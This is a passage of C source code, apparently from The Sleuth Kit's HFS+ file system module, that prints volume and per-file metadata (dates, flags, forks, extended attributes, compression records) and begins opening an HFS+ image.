if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_HFSPLUS)
tsk_fprintf(hFile, "Mac OS X\n");
else if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_HFSJ)
tsk_fprintf(hFile, "Mac OS X, Journaled\n");
else if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_FSK)
tsk_fprintf(hFile, "failed journal replay\n");
else if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_FSCK)
tsk_fprintf(hFile, "fsck_hfs\n");
else if (tsk_getu32(fs->endian, sb->last_mnt_ver) == HFS_VH_MVER_OS89)
tsk_fprintf(hFile, "Mac OS 8.1 - 9.2.2\n");
else
tsk_fprintf(hFile, "Unknown (%" PRIx32 "\n",
tsk_getu32(fs->endian, sb->last_mnt_ver));
/* State of the file system */
if ((tsk_getu32(fs->endian, hfs->fs->attr) & HFS_VH_ATTR_UNMOUNTED)
&& (!(tsk_getu32(fs->endian,
hfs->fs->attr) & HFS_VH_ATTR_INCONSISTENT)))
tsk_fprintf(hFile, "Volume Unmounted Properly\n");
else
tsk_fprintf(hFile, "Volume Unmounted Improperly\n");
tsk_fprintf(hFile, "Mount Count: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->write_cnt));
// Dates
// (creation date is in local time zone, not UTC, according to TN 1150)
mac_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, hfs->fs->cr_date));
tsk_fprintf(hFile, "\nCreation Date: \t%s\n",
tsk_fs_time_to_str(mktime(gmtime(&mac_time)), timeBuf));
mac_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, hfs->fs->m_date));
tsk_fprintf(hFile, "Last Written Date: \t%s\n",
tsk_fs_time_to_str(mac_time, timeBuf));
mac_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian,
hfs->fs->bkup_date));
tsk_fprintf(hFile, "Last Backup Date: \t%s\n",
tsk_fs_time_to_str(mac_time, timeBuf));
mac_time =
hfs_convert_2_unix_time(tsk_getu32(fs->endian, hfs->fs->chk_date));
tsk_fprintf(hFile, "Last Checked Date: \t%s\n",
tsk_fs_time_to_str(mac_time, timeBuf));
if (tsk_getu32(fs->endian, hfs->fs->attr) & HFS_VH_ATTR_SOFTWARE_LOCK)
tsk_fprintf(hFile, "Software write protect enabled\n");
/* Print journal information */
if (tsk_getu32(fs->endian, sb->attr) & HFS_VH_ATTR_JOURNALED) {
tsk_fprintf(hFile, "\nJournal Info Block: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->jinfo_blk));
}
tsk_fprintf(hFile, "\nMETADATA INFORMATION\n");
tsk_fprintf(hFile, "--------------------------------------------\n");
tsk_fprintf(hFile, "Range: %" PRIuINUM " - %" PRIuINUM "\n",
fs->first_inum, fs->last_inum);
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_BOOT]);
tsk_fprintf(hFile, "Bootable Folder ID: %" PRIuINUM, inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_START]);
tsk_fprintf(hFile, "Startup App ID: %" PRIuINUM, inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_OPEN]);
tsk_fprintf(hFile, "Startup Open Folder ID: %" PRIuINUM, inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_BOOT9]);
tsk_fprintf(hFile, "Mac OS 8/9 Blessed System Folder ID: %" PRIuINUM,
inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
inode = tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_BOOTX]);
tsk_fprintf(hFile, "Mac OS X Blessed System Folder ID: %" PRIuINUM,
inode);
if (inode > 0)
print_inode_file(hFile, fs, inode);
tsk_fprintf(hFile, "\n");
tsk_fprintf(hFile, "Number of files: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->file_cnt));
tsk_fprintf(hFile, "Number of folders: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->fldr_cnt));
tsk_fprintf(hFile, "\nCONTENT INFORMATION\n");
tsk_fprintf(hFile, "--------------------------------------------\n");
tsk_fprintf(hFile, "Block Range: %" PRIuDADDR " - %" PRIuDADDR "\n",
fs->first_block, fs->last_block);
if (fs->last_block != fs->last_block_act)
tsk_fprintf(hFile,
"Total Range in Image: %" PRIuDADDR " - %" PRIuDADDR "\n",
fs->first_block, fs->last_block_act);
tsk_fprintf(hFile, "Allocation Block Size: %u\n", fs->block_size);
tsk_fprintf(hFile, "Number of Free Blocks: %" PRIu32 "\n",
tsk_getu32(fs->endian, sb->free_blks));
if (tsk_getu32(fs->endian, hfs->fs->attr) & HFS_VH_ATTR_BADBLOCKS)
tsk_fprintf(hFile, "Volume has bad blocks\n");
return 0;
}
/************************* istat *******************************/
/**
* Text encoding names defined in TN1150, Table 2.
*/
static char *
text_encoding_name(uint32_t enc)
{
switch (enc) {
case 0:
return "MacRoman";
case 1:
return "MacJapanese";
case 2:
return "MacChineseTrad";
case 4:
return "MacKorean";
case 5:
return "MacArabic";
case 6:
return "MacHebrew";
case 7:
return "MacGreek";
case 8:
return "MacCyrillic";
case 9:
return "MacDevanagari";
case 10:
return "MacGurmukhi";
case 11:
return "MacGujarati";
case 12:
return "MacOriya";
case 13:
return "MacBengali";
case 14:
return "MacTamil";
case 15:
return "Telugu";
case 16:
return "MacKannada";
case 17:
return "MacMalayalam";
case 18:
return "MacSinhalese";
case 19:
return "MacBurmese";
case 20:
return "MacKhmer";
case 21:
return "MacThai";
case 22:
return "MacLaotian";
case 23:
return "MacGeorgian";
case 24:
return "MacArmenian";
case 25:
return "MacChineseSimp";
case 26:
return "MacTibetan";
case 27:
return "MacMongolian";
case 28:
return "MacEthiopic";
case 29:
return "MacCentralEurRoman";
case 30:
return "MacVietnamese";
case 31:
return "MacExtArabic";
case 33:
return "MacSymbol";
case 34:
return "MacDingbats";
case 35:
return "MacTurkish";
case 36:
return "MacCroatian";
case 37:
return "MacIcelandic";
case 38:
return "MacRomanian";
case 49:
case 140:
return "MacFarsi";
case 48:
case 152:
return "MacUkrainian";
default:
return "Unknown encoding";
}
}
#define HFS_PRINT_WIDTH 8
typedef struct {
FILE *hFile;
int idx;
TSK_DADDR_T startBlock;
uint32_t blockCount;
unsigned char accumulating;
} HFS_PRINT_ADDR;
static void
output_print_addr(HFS_PRINT_ADDR * print)
{
if (!print->accumulating)
return;
if (print->blockCount == 1) {
tsk_fprintf(print->hFile, "%" PRIuDADDR " ", print->startBlock);
print->idx += 1;
}
else if (print->blockCount > 1) {
tsk_fprintf(print->hFile, "%" PRIuDADDR "-%" PRIuDADDR " ",
print->startBlock, print->startBlock + print->blockCount - 1);
print->idx += 2;
}
if (print->idx >= HFS_PRINT_WIDTH) {
tsk_fprintf(print->hFile, "\n");
print->idx = 0;
}
}
static TSK_WALK_RET_ENUM
print_addr_act(TSK_FS_FILE * fs_file, TSK_OFF_T a_off, TSK_DADDR_T addr,
char *buf, size_t size, TSK_FS_BLOCK_FLAG_ENUM flags, void *ptr)
{
HFS_PRINT_ADDR *print = (HFS_PRINT_ADDR *) ptr;
if (print->accumulating) {
if (addr == print->startBlock + print->blockCount) {
++print->blockCount;
}
else {
output_print_addr(print);
print->startBlock = addr;
print->blockCount = 1;
}
}
else {
print->startBlock = addr;
print->blockCount = 1;
print->accumulating = TRUE;
}
return TSK_WALK_CONT;
}
/**
* Print details on a specific file to a file handle.
*
* @param fs File system file is located in
* @param hFile File name to print text to
* @param inum Address of file in file system
* @param numblock The number of blocks in file to force print (can go beyond file size)
* @param sec_skew Clock skew in seconds to also print times in
*
* @returns 1 on error and 0 on success
*/
static uint8_t
hfs_istat(TSK_FS_INFO * fs, TSK_FS_ISTAT_FLAG_ENUM istat_flags, FILE * hFile, TSK_INUM_T inum,
TSK_DADDR_T numblock, int32_t sec_skew)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
TSK_FS_FILE *fs_file;
char hfs_mode[12];
HFS_PRINT_ADDR print;
HFS_ENTRY entry;
char timeBuf[128];
// Compression ATTR, if there is one:
const TSK_FS_ATTR *compressionAttr = NULL;
RES_DESCRIPTOR *rd; // descriptor of a resource
tsk_error_reset();
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_istat: inum: %" PRIuINUM " numblock: %" PRIu32 "\n",
inum, numblock);
if ((fs_file = tsk_fs_file_open_meta(fs, NULL, inum)) == NULL) {
error_returned("hfs_istat: getting metadata for the file");
return 1;
}
if (inum >= HFS_FIRST_USER_CNID) {
int rslt;
tsk_fprintf(hFile, "File Path: ");
rslt = print_parent_path(hFile, fs, inum);
if (rslt != 0)
tsk_fprintf(hFile, " Error in printing path\n");
else
tsk_fprintf(hFile, "\n");
}
else {
// All of the files in this inum range have names without nulls,
// slashes or control characters. So, it is OK to print this UTF8
// string this way.
if (fs_file->meta->name2 != NULL)
tsk_fprintf(hFile, "File Name: %s\n",
fs_file->meta->name2->name);
}
tsk_fprintf(hFile, "Catalog Record: %" PRIuINUM "\n", inum);
tsk_fprintf(hFile, "%sAllocated\n",
(fs_file->meta->flags & TSK_FS_META_FLAG_UNALLOC) ? "Not " : "");
tsk_fprintf(hFile, "Type:\t");
if (fs_file->meta->type == TSK_FS_META_TYPE_REG)
tsk_fprintf(hFile, "File\n");
else if (TSK_FS_IS_DIR_META(fs_file->meta->type))
tsk_fprintf(hFile, "Folder\n");
else
tsk_fprintf(hFile, "\n");
tsk_fs_meta_make_ls(fs_file->meta, hfs_mode, sizeof(hfs_mode));
tsk_fprintf(hFile, "Mode:\t%s\n", hfs_mode);
tsk_fprintf(hFile, "Size:\t%" PRIuOFF "\n", fs_file->meta->size);
if (fs_file->meta->link)
tsk_fprintf(hFile, "Symbolic link to:\t%s\n", fs_file->meta->link);
tsk_fprintf(hFile, "uid / gid: %" PRIuUID " / %" PRIuGID "\n",
fs_file->meta->uid, fs_file->meta->gid);
tsk_fprintf(hFile, "Link count:\t%d\n", fs_file->meta->nlink);
if (hfs_cat_file_lookup(hfs, inum, &entry, TRUE) == 0) {
hfs_uni_str *nm = &entry.thread.name;
char name_buf[HFS_MAXNAMLEN + 1];
TSK_INUM_T par_cnid; // parent CNID
tsk_fprintf(hFile, "\n");
hfs_UTF16toUTF8(fs, nm->unicode, (int) tsk_getu16(fs->endian,
nm->length), &name_buf[0], HFS_MAXNAMLEN + 1,
HFS_U16U8_FLAG_REPLACE_SLASH | HFS_U16U8_FLAG_REPLACE_CONTROL);
tsk_fprintf(hFile, "File Name: %s\n", name_buf);
// Test here to see if this is a hard link.
par_cnid = tsk_getu32(fs->endian, &(entry.thread.parent_cnid));
if ((hfs->has_meta_dir_crtime && par_cnid == hfs->meta_dir_inum) ||
(hfs->has_meta_crtime && par_cnid == hfs->meta_inum)) {
int instr = strncmp(name_buf, "iNode", 5);
int drstr = strncmp(name_buf, "dir_", 4);
if (instr == 0 &&
hfs->has_meta_crtime && par_cnid == hfs->meta_inum) {
tsk_fprintf(hFile, "This is a hard link to a file\n");
}
else if (drstr == 0 &&
hfs->has_meta_dir_crtime &&
par_cnid == hfs->meta_dir_inum) {
tsk_fprintf(hFile, "This is a hard link to a folder.\n");
}
}
/* The cat.perm union contains file-type specific values.
* Print them if they are relevant. */
if ((fs_file->meta->type == TSK_FS_META_TYPE_CHR) ||
(fs_file->meta->type == TSK_FS_META_TYPE_BLK)) {
tsk_fprintf(hFile, "Device ID:\t%" PRIu32 "\n",
tsk_getu32(fs->endian, entry.cat.std.perm.special.raw));
}
else if ((tsk_getu32(fs->endian,
entry.cat.std.u_info.file_type) ==
HFS_HARDLINK_FILE_TYPE)
&& (tsk_getu32(fs->endian,
entry.cat.std.u_info.file_cr) ==
HFS_HARDLINK_FILE_CREATOR)) {
// technically, the creation date of this item should be the same as either the
// creation date of the "HFS+ Private Data" folder or the creation date of the root folder
tsk_fprintf(hFile, "Hard link inode number\t %" PRIu32 "\n",
tsk_getu32(fs->endian, entry.cat.std.perm.special.inum));
}
tsk_fprintf(hFile, "Admin flags: %" PRIu8,
entry.cat.std.perm.a_flags);
if (entry.cat.std.perm.a_flags != 0) {
tsk_fprintf(hFile, " - ");
if (entry.cat.std.perm.a_flags & HFS_PERM_AFLAG_ARCHIVED)
tsk_fprintf(hFile, "archived ");
if (entry.cat.std.perm.a_flags & HFS_PERM_AFLAG_IMMUTABLE)
tsk_fprintf(hFile, "immutable ");
if (entry.cat.std.perm.a_flags & HFS_PERM_AFLAG_APPEND)
tsk_fprintf(hFile, "append-only ");
}
tsk_fprintf(hFile, "\n");
tsk_fprintf(hFile, "Owner flags: %" PRIu8,
entry.cat.std.perm.o_flags);
if (entry.cat.std.perm.o_flags != 0) {
tsk_fprintf(hFile, " - ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_NODUMP)
tsk_fprintf(hFile, "no-dump ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_IMMUTABLE)
tsk_fprintf(hFile, "immutable ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_APPEND)
tsk_fprintf(hFile, "append-only ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_OPAQUE)
tsk_fprintf(hFile, "opaque ");
if (entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_COMPRESSED)
tsk_fprintf(hFile, "compressed ");
}
tsk_fprintf(hFile, "\n");
if (tsk_getu16(fs->endian,
entry.cat.std.flags) & HFS_FILE_FLAG_LOCKED)
tsk_fprintf(hFile, "Locked\n");
if (tsk_getu16(fs->endian,
entry.cat.std.flags) & HFS_FILE_FLAG_ATTR)
tsk_fprintf(hFile, "Has extended attributes\n");
if (tsk_getu16(fs->endian,
entry.cat.std.flags) & HFS_FILE_FLAG_ACL)
tsk_fprintf(hFile, "Has security data (ACLs)\n");
// File_type and file_cr are not relevant for Folders
if ( !TSK_FS_IS_DIR_META(fs_file->meta->type)){
int windx; // loop index
tsk_fprintf(hFile,
"File type:\t%04" PRIx32 " ",
tsk_getu32(fs->endian, entry.cat.std.u_info.file_type));
for (windx = 0; windx < 4; ++windx) {
uint8_t cu = entry.cat.std.u_info.file_type[windx];
if (cu >= 32 && cu <= 126)
tsk_fprintf(hFile, "%c", (char) cu);
else
tsk_fprintf(hFile, " ");
}
tsk_fprintf(hFile, "\n");
tsk_fprintf(hFile,
"File creator:\t%04" PRIx32 " ",
tsk_getu32(fs->endian, entry.cat.std.u_info.file_cr));
for (windx = 0; windx < 4; ++windx) {
uint8_t cu = entry.cat.std.u_info.file_cr[windx];
if (cu >= 32 && cu <= 126)
tsk_fprintf(hFile, "%c", (char) cu);
else
tsk_fprintf(hFile, " ");
}
tsk_fprintf(hFile, "\n");
} // END if(not folder)
if (tsk_getu16(fs->endian,
entry.cat.std.u_info.flags) & HFS_FINDER_FLAG_NAME_LOCKED)
tsk_fprintf(hFile, "Name locked\n");
if (tsk_getu16(fs->endian,
entry.cat.std.u_info.flags) & HFS_FINDER_FLAG_HAS_BUNDLE)
tsk_fprintf(hFile, "Has bundle\n");
if (tsk_getu16(fs->endian,
entry.cat.std.u_info.flags) & HFS_FINDER_FLAG_IS_INVISIBLE)
tsk_fprintf(hFile, "Is invisible\n");
if (tsk_getu16(fs->endian,
entry.cat.std.u_info.flags) & HFS_FINDER_FLAG_IS_ALIAS)
tsk_fprintf(hFile, "Is alias\n");
tsk_fprintf(hFile, "Text encoding:\t%" PRIx32 " = %s\n",
tsk_getu32(fs->endian, entry.cat.std.text_enc),
text_encoding_name(tsk_getu32(fs->endian,
entry.cat.std.text_enc)));
if (tsk_getu16(fs->endian,
entry.cat.std.rec_type) == HFS_FILE_RECORD) {
tsk_fprintf(hFile, "Resource fork size:\t%" PRIu64 "\n",
tsk_getu64(fs->endian, entry.cat.resource.logic_sz));
}
}
if (sec_skew != 0) {
tsk_fprintf(hFile, "\nAdjusted times:\n");
if (fs_file->meta->mtime)
fs_file->meta->mtime -= sec_skew;
if (fs_file->meta->atime)
fs_file->meta->atime -= sec_skew;
if (fs_file->meta->ctime)
fs_file->meta->ctime -= sec_skew;
if (fs_file->meta->crtime)
fs_file->meta->crtime -= sec_skew;
if (fs_file->meta->time2.hfs.bkup_time)
fs_file->meta->time2.hfs.bkup_time -= sec_skew;
tsk_fprintf(hFile, "Created:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->crtime, timeBuf));
tsk_fprintf(hFile, "Content Modified:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->mtime, timeBuf));
tsk_fprintf(hFile, "Attributes Modified:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->ctime, timeBuf));
tsk_fprintf(hFile, "Accessed:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->atime, timeBuf));
tsk_fprintf(hFile, "Backed Up:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->time2.hfs.bkup_time,
timeBuf));
if (fs_file->meta->mtime)
fs_file->meta->mtime += sec_skew;
if (fs_file->meta->atime)
fs_file->meta->atime += sec_skew;
if (fs_file->meta->ctime)
fs_file->meta->ctime += sec_skew;
if (fs_file->meta->crtime)
fs_file->meta->crtime += sec_skew;
if (fs_file->meta->time2.hfs.bkup_time)
fs_file->meta->time2.hfs.bkup_time += sec_skew;
tsk_fprintf(hFile, "\nOriginal times:\n");
}
else {
tsk_fprintf(hFile, "\nTimes:\n");
}
tsk_fprintf(hFile, "Created:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->crtime, timeBuf));
tsk_fprintf(hFile, "Content Modified:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->mtime, timeBuf));
tsk_fprintf(hFile, "Attributes Modified:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->ctime, timeBuf));
tsk_fprintf(hFile, "Accessed:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->atime, timeBuf));
tsk_fprintf(hFile, "Backed Up:\t%s\n",
tsk_fs_time_to_str(fs_file->meta->time2.hfs.bkup_time, timeBuf));
// IF this is a regular file, then print out the blocks of the DATA and RSRC forks.
if (tsk_getu16(fs->endian, entry.cat.std.rec_type) == HFS_FILE_RECORD) {
// Only print DATA fork blocks if this file is NOT compressed
// N.B., a compressed file has no data fork, and tsk_fs_file_walk() will
// do the wrong thing!
if (!(entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_COMPRESSED)) {
if (!(istat_flags & TSK_FS_ISTAT_RUNLIST)) {
tsk_fprintf(hFile, "\nData Fork Blocks:\n");
print.idx = 0;
print.hFile = hFile;
print.accumulating = FALSE;
print.startBlock = 0;
print.blockCount = 0;
if (tsk_fs_file_walk_type(fs_file,
TSK_FS_ATTR_TYPE_HFS_DATA, HFS_FS_ATTR_ID_DATA,
(TSK_FS_FILE_WALK_FLAG_AONLY |
TSK_FS_FILE_WALK_FLAG_SLACK), print_addr_act,
(void *)&print)) {
tsk_fprintf(hFile, "\nError reading file data fork\n");
tsk_error_print(hFile);
tsk_error_reset();
}
else {
output_print_addr(&print);
if (print.idx != 0)
tsk_fprintf(hFile, "\n");
}
}
}
// Only print out the blocks of the Resource fork if it has nonzero size
if (tsk_getu64(fs->endian, entry.cat.resource.logic_sz) > 0) {
if (! (istat_flags & TSK_FS_ISTAT_RUNLIST)) {
tsk_fprintf(hFile, "\nResource Fork Blocks:\n");
print.idx = 0;
print.hFile = hFile;
print.accumulating = FALSE;
print.startBlock = 0;
print.blockCount = 0;
if (tsk_fs_file_walk_type(fs_file,
TSK_FS_ATTR_TYPE_HFS_RSRC, HFS_FS_ATTR_ID_RSRC,
(TSK_FS_FILE_WALK_FLAG_AONLY |
TSK_FS_FILE_WALK_FLAG_SLACK), print_addr_act,
(void *)&print)) {
tsk_fprintf(hFile, "\nError reading file resource fork\n");
tsk_error_print(hFile);
tsk_error_reset();
}
else {
output_print_addr(&print);
if (print.idx != 0)
tsk_fprintf(hFile, "\n");
}
}
}
}
// Force the loading of all attributes.
(void) tsk_fs_file_attr_get(fs_file);
/* Print all of the attributes */
tsk_fprintf(hFile, "\nAttributes: \n");
if (fs_file->meta->attr) {
int cnt, i;
// cycle through the attributes
cnt = tsk_fs_file_attr_getsize(fs_file);
for (i = 0; i < cnt; ++i) {
const char *type; // type of the attribute as a string
const TSK_FS_ATTR *fs_attr =
tsk_fs_file_attr_get_idx(fs_file, i);
if (!fs_attr)
continue;
type = hfs_attrTypeName((uint32_t) fs_attr->type);
// We will need to do something better than this, in the end.
//type = "Data";
/* print the layout if it is non-resident and not "special" */
if (fs_attr->flags & TSK_FS_ATTR_NONRES) {
//NTFS_PRINT_ADDR print_addr;
tsk_fprintf(hFile,
"Type: %s (%" PRIu32 "-%" PRIu16
") Name: %s Non-Resident%s%s%s size: %"
PRIuOFF " init_size: %" PRIuOFF "\n", type,
fs_attr->type, fs_attr->id,
(fs_attr->name) ? fs_attr->name : "N/A",
(fs_attr->flags & TSK_FS_ATTR_ENC) ? ", Encrypted" :
"",
(fs_attr->flags & TSK_FS_ATTR_COMP) ? ", Compressed" :
"",
(fs_attr->flags & TSK_FS_ATTR_SPARSE) ? ", Sparse" :
"", fs_attr->size, fs_attr->nrd.initsize);
if (istat_flags & TSK_FS_ISTAT_RUNLIST) {
if (tsk_fs_attr_print(fs_attr, hFile)) {
tsk_fprintf(hFile, "\nError creating run lists\n");
tsk_error_print(hFile);
tsk_error_reset();
}
}
} // END: non-resident attribute case
else {
tsk_fprintf(hFile,
"Type: %s (%" PRIu32 "-%" PRIu16
") Name: %s Resident%s%s%s size: %"
PRIuOFF "\n",
type,
fs_attr->type,
fs_attr->id,
(fs_attr->name) ? fs_attr->name : "N/A",
(fs_attr->flags & TSK_FS_ATTR_ENC) ? ", Encrypted" :
"",
(fs_attr->flags & TSK_FS_ATTR_COMP) ? ", Compressed" :
"",
(fs_attr->flags & TSK_FS_ATTR_SPARSE) ? ", Sparse" :
"", fs_attr->size);
if (fs_attr->type == TSK_FS_ATTR_TYPE_HFS_COMP_REC) {
if (compressionAttr == NULL) {
compressionAttr = fs_attr;
}
else {
// Problem: there is more than one compression attribute
error_detected(TSK_ERR_FS_CORRUPT,
"hfs_istat: more than one compression attribute");
return 1;
}
}
} // END: else (RESIDENT attribute case)
} // END: for(;;) loop over attributes
} // END: if(fs_file->meta->attr is non-NULL)
if ((entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_COMPRESSED)
&& (compressionAttr == NULL))
tsk_fprintf(hFile,
"WARNING: Compression Flag is set, but there"
" is no compression record for this file.\n");
if (((entry.cat.std.perm.o_flags & HFS_PERM_OFLAG_COMPRESSED) == 0)
&& (compressionAttr != NULL))
tsk_fprintf(hFile,
"WARNING: Compression Flag is NOT set, but there"
" is a compression record for this file.\n");
// IF this is a compressed file
if (compressionAttr != NULL) {
const TSK_FS_ATTR *fs_attr = compressionAttr;
int attrReadResult;
DECMPFS_DISK_HEADER *cmph;
uint32_t cmpType;
uint64_t uncSize;
uint64_t cmpSize = 0;
// Read the attribute. It cannot be too large because it is stored in
// a btree node
char *aBuf = (char *) tsk_malloc((size_t) fs_attr->size);
if (aBuf == NULL) {
error_returned("hfs_istat: space for a compression attribute");
return 1;
}
attrReadResult = tsk_fs_attr_read(fs_attr, (TSK_OFF_T) 0,
aBuf, (size_t) fs_attr->size,
(TSK_FS_FILE_READ_FLAG_ENUM) 0x00);
if (attrReadResult == -1) {
error_returned("hfs_istat: reading the compression attribute");
free(aBuf);
return 1;
}
else if (attrReadResult < fs_attr->size) {
error_detected(TSK_ERR_FS_READ,
"hfs_istat: could not read the whole compression attribute");
free(aBuf);
return 1;
}
// Now, cast the attr into a compression header
cmph = (DECMPFS_DISK_HEADER *) aBuf;
cmpType = tsk_getu32(TSK_LIT_ENDIAN, cmph->compression_type);
uncSize = tsk_getu64(TSK_LIT_ENDIAN, cmph->uncompressed_size);
tsk_fprintf(hFile, "\nCompressed File:\n");
tsk_fprintf(hFile, " Uncompressed size: %llu\n", uncSize);
switch (cmpType) {
case DECMPFS_TYPE_ZLIB_ATTR:
// Data is inline
{
// size of header, with indicator byte if uncompressed
uint32_t off = (cmph->attr_bytes[0] & 0x0F) == 0x0F ? 17 : 16;
cmpSize = fs_attr->size - off;
tsk_fprintf(hFile,
" Data follows compression record in the CMPF attribute\n"
" %" PRIu64 " bytes of data at offset %u, %s compressed\n",
cmpSize, off, off == 16 ? "zlib" : "not");
}
break;
case DECMPFS_TYPE_LZVN_ATTR:
// Data is inline
{
// size of header, with indicator byte if uncompressed
uint32_t off = cmph->attr_bytes[0] == 0x06 ? 17 : 16;
cmpSize = fs_attr->size - off;
tsk_fprintf(hFile,
" Data follows compression record in the CMPF attribute\n"
" %" PRIu64 " bytes of data at offset %u, %s compressed\n",
cmpSize, off, off == 16 ? "lzvn" : "not");
}
break;
case DECMPFS_TYPE_ZLIB_RSRC:
// Data is zlib compressed in the resource fork
tsk_fprintf(hFile,
" Data is zlib compressed in the resource fork\n");
break;
case DECMPFS_TYPE_LZVN_RSRC:
// Data is lzvn compressed in the resource fork
tsk_fprintf(hFile,
" Data is lzvn compressed in the resource fork\n");
break;
default:
tsk_fprintf(hFile, " Compression type is %u: UNKNOWN\n",
cmpType);
}
free(aBuf);
if ((cmpType == DECMPFS_TYPE_ZLIB_RSRC ||
cmpType == DECMPFS_TYPE_LZVN_RSRC)
&& (tsk_getu64(fs->endian, entry.cat.resource.logic_sz) == 0))
tsk_fprintf(hFile,
"WARNING: Compression record indicates compressed data"
" in the RSRC Fork, but that fork is empty.\n");
}
// This will return NULL if there is an error, or if there are no resources
rd = hfs_parse_resource_fork(fs_file);
// TODO: Should check the errnum here to see if there was an error
if (rd != NULL) {
tsk_fprintf(hFile, "\nResources:\n");
while (rd) {
tsk_fprintf(hFile,
" Type: %s \tID: %-5u \tOffset: %-5u \tSize: %-5u \tName: %s\n",
rd->type, rd->id, rd->offset, rd->length, rd->name);
rd = rd->next;
}
}
// This is OK to call with NULL
free_res_descriptor(rd);
tsk_fs_file_close(fs_file);
return 0;
}
static TSK_FS_ATTR_TYPE_ENUM
hfs_get_default_attr_type(const TSK_FS_FILE * a_file)
{
// The HFS+ special files have a default attr type of "Default"
TSK_INUM_T inum = a_file->meta->addr;
if (inum == 3 || // Extents File
inum == 4 || // Catalog File
inum == 5 || // Bad Blocks File
inum == 6 || // Block Map (Allocation File)
inum == 7 || // Startup File
inum == 8 || // Attributes File
inum == 14 || // Not sure if these two will actually work. I don't see
inum == 15) // any code to load the attrs of these files, if they exist.
return TSK_FS_ATTR_TYPE_DEFAULT;
// The "regular" files and symbolic links have a DATA fork with type "DATA"
if (a_file->meta->type == TSK_FS_META_TYPE_REG ||
a_file->meta->type == TSK_FS_META_TYPE_LNK)
// This should be an HFS-specific type.
return TSK_FS_ATTR_TYPE_HFS_DATA;
// We've got to return *something* for every file, so we return this.
return TSK_FS_ATTR_TYPE_DEFAULT;
}
static void
hfs_close(TSK_FS_INFO * fs)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
// We'll grab this lock a bit early.
tsk_take_lock(&(hfs->metadata_dir_cache_lock));
fs->tag = 0;
free(hfs->fs);
if (hfs->catalog_file) {
tsk_fs_file_close(hfs->catalog_file);
hfs->catalog_attr = NULL;
}
if (hfs->blockmap_file) {
tsk_fs_file_close(hfs->blockmap_file);
hfs->blockmap_attr = NULL;
}
if (hfs->meta_dir) {
tsk_fs_dir_close(hfs->meta_dir);
hfs->meta_dir = NULL;
}
if (hfs->dir_meta_dir) {
tsk_fs_dir_close(hfs->dir_meta_dir);
hfs->dir_meta_dir = NULL;
}
if (hfs->extents_file) {
tsk_fs_file_close(hfs->extents_file);
hfs->extents_file = NULL;
}
tsk_release_lock(&(hfs->metadata_dir_cache_lock));
tsk_deinit_lock(&(hfs->metadata_dir_cache_lock));
tsk_fs_free((TSK_FS_INFO *)hfs);
}
/* hfs_open - open an hfs file system
*
* Return NULL on error (or not an HFS or HFS+ file system)
* */
TSK_FS_INFO *
hfs_open(TSK_IMG_INFO * img_info, TSK_OFF_T offset,
TSK_FS_TYPE_ENUM ftype, uint8_t test)
{
HFS_INFO *hfs;
unsigned int len;
TSK_FS_INFO *fs;
ssize_t cnt;
TSK_FS_FILE *file; // The root directory, or the metadata directories
TSK_INUM_T inum; // The inum (or CNID) of the metadata directories
int8_t result; // of tsk_fs_path2inum()
tsk_error_reset();
if (TSK_FS_TYPE_ISHFS(ftype) == 0) {
tsk_error_set_errno(TSK_ERR_FS_ARG);
tsk_error_set_errstr("Invalid FS Type in hfs_open");
return NULL;
}
if ((hfs = (HFS_INFO *) tsk_fs_malloc(sizeof(HFS_INFO))) == NULL)
return NULL;
fs = &(hfs->fs_info);
fs->ftype = TSK_FS_TYPE_HFS;
fs->duname = "Allocation Block";
fs->tag = TSK_FS_INFO_TAG;
fs->flags = 0;
fs->img_info = img_info;
fs->offset = offset;
/*
* Read the superblock.
*/
len = sizeof(hfs_plus_vh);
if ((hfs->fs = (hfs_plus_vh *) tsk_malloc(len)) == NULL) {
fs->tag = 0;
tsk_fs_free((TSK_FS_INFO *)hfs);
return NULL;
}
if (hfs_checked_read_random(fs, (char *) hfs->fs, len,
(TSK_OFF_T) HFS_VH_OFF)) {
tsk_error_set_errstr2("hfs_open: superblock");
fs->tag = 0;
free(hfs->fs);
tsk_fs_free((TSK_FS_INFO *)hfs);
return NULL;
}
/*
* Verify we are looking at an HFS+ image
*/
